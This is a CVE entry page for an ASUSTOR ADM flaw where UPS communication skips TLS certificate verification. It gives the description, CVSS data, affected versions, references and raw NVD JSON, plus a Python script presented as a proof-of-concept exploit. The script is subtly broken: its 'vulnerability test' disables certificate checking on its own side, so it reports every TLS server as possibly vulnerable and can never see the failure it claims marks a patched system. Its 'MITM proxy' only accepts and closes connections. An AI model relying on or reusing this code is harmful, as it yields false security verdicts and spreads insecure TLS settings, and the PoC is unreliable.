CVE-2025-13053

Description

When a user configures the NAS to retrieve UPS status or control the UPS, a non-enforced TLS certificate verification can allow an attacker able to intercept network traffic between the client and server can perform a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the UPS server configuation. This issue affects ADM: from 4.1.0 through 4.3.3.RKD2, from 5.0.0 through 5.1.0.RN42.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:* - VULNERABLE

ASUSTOR ADM 4.1.0 至 4.3.3.RKD2

ASUSTOR ADM 5.0.0 至 5.1.0.RN42

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-13053 PoC - ASUSTOR ADM UPS TLS Certificate Verification Bypass
Note: This PoC is for educational and authorized testing purposes only.
Author: Security Researcher
Reference: https://www.asustor.com/security/security_advisory_detail?id=49
"""

import ssl
import socket
import argparse

def create_mitm_proxy(listen_port, target_host, target_port):
    """
    Create a simple MITM proxy to demonstrate the certificate validation bypass.
    In vulnerable versions, the UPS client accepts any certificate.
    """
    print(f"[*] Starting MITM proxy on port {listen_port}")
    print(f"[*] Target: {target_host}:{target_port}")
    
    # Create socket context with self-signed certificate (normally rejected)
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False  # Bypass hostname verification
    context.verify_mode = ssl.CERT_NONE  # Bypass certificate verification
    
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_sock.bind(('0.0.0.0', listen_port))
    server_sock.listen(5)
    
    print("[+] MITM proxy listening - vulnerable clients will connect without warning")
    print("[!] In affected ADM versions, UPS communication will proceed with self-signed cert")
    
    while True:
        client_sock, addr = server_sock.accept()
        print(f"[*] Connection from {addr}")
        # In real attack, forward traffic to target while logging sensitive data
        client_sock.close()

def test_vulnerable_connection(target_host, target_port):
    """
    Test if target ASUSTOR ADM is vulnerable by attempting connection
    with self-signed certificate (should fail in patched versions).
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    
    try:
        with socket.create_connection((target_host, target_port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=target_host) as ssock:
                cert = ssock.getpeercert()
                print(f"[+] Connected successfully to {target_host}:{target_port}")
                print(f"[*] Certificate: {cert}")
                print("[!] Connection succeeded - target may be vulnerable")
                return True
    except ssl.SSLCertVerificationError as e:
        print(f"[-] Certificate verification failed (expected for patched systems): {e}")
        return False
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-13053 PoC")
    parser.add_argument("--mode", choices=["proxy", "test"], default="test")
    parser.add_argument("--target", default="ups-server.local", help="Target UPS server")
    parser.add_argument("--port", type=int, default=443, help="Target port")
    args = parser.parse_args()
    
    if args.mode == "proxy":
        create_mitm_proxy(8443, args.target, args.port)
    else:
        test_vulnerable_connection(args.target, args.port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13053
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13053
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13053/
[4] VulDB https://vuldb.com/cve/CVE-2025-13053
[5] https://www.asustor.com/security/security_advisory_detail?id=49

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13053", "sourceIdentifier": "[email protected]", "published": "2025-12-12T03:15:51.377", "lastModified": "2026-01-28T14:54:44.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When a user configures the NAS to retrieve UPS status or control the UPS, a non-enforced TLS certificate verification can allow an attacker able to intercept network traffic between the client and server can perform a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the UPS server configuation.\n\nThis issue affects ADM: from 4.1.0 through 4.3.3.RKD2, from 5.0.0 through 5.1.0.RN42."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.1.0.RHU2", "versionEndExcluding": "4.3.3.ROF1", "matchCriteriaId": "36FDF2DA-A9E9-4BC6-BC65-97C877697359"}, {"vulnerable": true, "criteria": "cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0.ra82", "versionEndExcluding": "5.1.1.RCI1", "matchCriteriaId": "9EAB743A-59CB-48AD-9CA0-9C3B714B83E5"}]}]}], "references": [{"url": "https://www.asustor.com/security/security_advisory_detail?id=49", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}